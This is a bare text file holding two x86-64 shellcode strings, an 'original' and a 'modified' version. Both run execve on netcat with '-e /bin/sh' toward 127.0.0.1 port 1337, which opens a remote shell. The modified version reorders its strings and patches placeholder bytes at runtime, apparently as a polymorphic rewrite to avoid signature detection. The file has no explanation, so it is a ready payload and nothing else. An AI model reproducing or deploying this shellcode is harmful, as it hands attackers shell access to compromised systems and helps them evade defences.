original shellcode 
"\xeb\x5a\x41\x5b\x48\x31\xd2\x52\x48\xbb\x2f\x62\x69"
"\x6e\x2f\x2f\x73\x68\x53\x49\x89\xe2\x49\xb9\xff\xff"
"\xff\xff\xff\xff\x2d\x65\x49\xc1\xe9\x30\x41\x51\x49"
"\x89\xe1\x49\xb8\xff\xff\xff\xff\x31\x33\x33\x37\x49"
"\xc1\xe8\x20\x41\x50\x49\x89\xe0\x52\x48\xbb\x2f\x62"
"\x69\x6e\x2f\x2f\x6e\x63\x53\x48\x89\xe7\x52\x41\x52"
"\x41\x51\x41\x50\x41\x53\x57\x48\x89\xe6\x04\x3b\x0f"
"\x05\xe8\xa1\xff\xff\xff\x31\x32\x37\x2e\x30\x2e\x30"
"\x2e\x31";

len = 106

modified shellcode 
"\xeb\x49\x48\x31\xd2\x5f\x80\x77\x07\x41\x80\x77\x11"
"\x41\x80\x77\x16\x41\x80\x77\x19\x41\x80\x77\x21\x41"
"\x48\x8d\x3f\x4c\x8d\x57\x08\x4c\x8d\x47\x12\x48\x8d"
"\x5f\x17\x4c\x8d\x4f\x1a\x52\x41\x51\x53\x41\x50\x41"
"\x52\x57\x48\x89\xe6\x04\x3b\x4d\x31\xf6\x66\x41\xbe"
"\x0f\x05\x41\x56\x54\x41\x5e\x41\xff\xd6\xe8\xb2\xff"
"\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x41\x31\x32\x37"
"\x2e\x30\x2e\x30\x2e\x31\x41\x31\x33\x33\x37\x41\x2d"
"\x65\x41\x2f\x62\x69\x6e\x2f\x73\x68\x41";

len = 100
